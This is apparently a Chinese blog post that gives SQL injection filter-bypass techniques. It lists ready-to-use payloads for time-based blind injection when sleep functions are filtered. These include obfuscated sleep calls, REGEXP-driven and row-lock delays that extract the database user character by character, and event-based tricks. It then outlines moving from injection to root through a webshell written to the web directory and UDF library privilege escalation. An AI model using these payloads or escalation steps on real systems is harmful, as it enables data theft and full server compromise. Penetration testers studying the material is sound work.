WEB安全--SQL注入--bypass技巧2

继之前文章的补充:

WEB安全--SQL注入--bypass技巧_sql注入过滤空格-CSDN博客

Q1:发现sql注入的时间盲注时,如果时间盲注的函数都被过滤了,怎么办?

除了找其他函数替换、编码等方式,还有以下方式绕过:

1、尝试其他注入手段是否有效果,比如报错注入、DNSLog外带等;
2、将被过滤的函数以拼接的方式呈现(如果正则验证不严格可能绕过):
sql 复制代码
SELECT /*!50000sleep*/(5);
SELECT s||l||e||e||p(5);  -- Oracle
SELECT sle+ep(5);  --MSSQL
3、利用其他延时机制模拟相同效果:

笛卡尔积+大量数据处理(MySQL)

sql 复制代码
SELECT COUNT(*) FROM large_table1, large_table2, large_table3 WHERE ...

递归(MSSQL/PostgreSQL)

sql 复制代码
WITH RECURSIVE t(n) AS (
  SELECT 1 UNION ALL SELECT n+1 FROM t WHERE n < 1000000
)
SELECT * FROM t;
4、响应包判断:

所谓sql时间盲注指页面没有任何回显,但实际情况下响应包的内容可能会因为请求的sql语句而产生细微变化。

根据这一特性,我们可以尝试用普通的真假条件语句结合响应包中的内容去判断,可以将此sql时间盲注转化为类似布尔盲注的形式。

sql 复制代码
?id=1' AND (condition) --+
5、构造事件:

构造一个事件或触发器,让它执行慢查询或利用其副作用来判断条件是否成立(要有写权限)。

sql 复制代码
CREATE EVENT myevent ON SCHEDULE AT CURRENT_TIMESTAMP + INTERVAL 5 SECOND DO SELECT 1;
6、正则匹配:

某些复杂的正则或字符串处理函数在不同的输入下计算量不同,可造成微小但可检测的延迟。

sql 复制代码
1' AND IF(ASCII(SUBSTRING((SELECT user()),1,1)) > 100, 
    'A' REGEXP BINARY REPEAT('A',1000000), 
    1)--+
7、加锁操作延时:

如果条件不成立,快速返回;

如果条件成立→ 查询 users 中 id=1 并对其加锁,当前连接挂起等待锁释放(通常可控制几秒)

sql 复制代码
1' AND IF(ASCII(SUBSTRING((SELECT user()),1,1)) > 100, 
    (SELECT 1 FROM users WHERE id=1 FOR UPDATE), 
    1)--+

Q2、在服务器权限为普通用户是,sql注入如何获取服务器root权限?

判断注入的类型

判断数据库类型、版本等信息

判断当前用户权限(至少需要有文件写权限)

sql注入将webshell写入服务器web目录中(需要知道物理路径)==> 服务器脚本提权 ==> 在蚁剑中执行系统命令

上传.dll/.so文件(需要知道物理路径)==> 进行系统提权(UDF) ==> 在数据库命令行执行系统命令

相关推荐
余防13 分钟前
代码审计
安全·web安全·网络安全
孟意昶1 小时前
Spark专题-第三部分:性能监控与实战优化(3)-数据倾斜优化
大数据·分布式·sql·spark
盛满暮色 风止何安3 小时前
网络安全设备 防火墙
服务器·网络·网络协议·计算机网络·安全·web安全·网络安全
养生技术人14 小时前
Oracle OCP认证考试题目详解082系列第54题
数据库·sql·oracle·运维开发·database·开闭原则·ocp
合作小小程序员小小店14 小时前
Web渗透之一句话木马
web安全·网络安全·安全威胁分析·安全架构·安全性测试
white-persist14 小时前
Burp Suite模拟器抓包全攻略
前端·网络·安全·web安全·notepad++·原型模式
编程充电站pro16 小时前
SQL 子查询与多表 JOIN 用法大全(速查版)
数据库·sql
Dersun16 小时前
mysql数据库学习之常用函数(五)
数据库·sql·学习·mysql·ai编程
木心操作20 小时前
nodejs动态创建sql server表
前端·javascript·sql
网安小白的进阶之路20 小时前
A模块 系统与网络安全 第四门课 弹性交换网络-3
网络·安全·web安全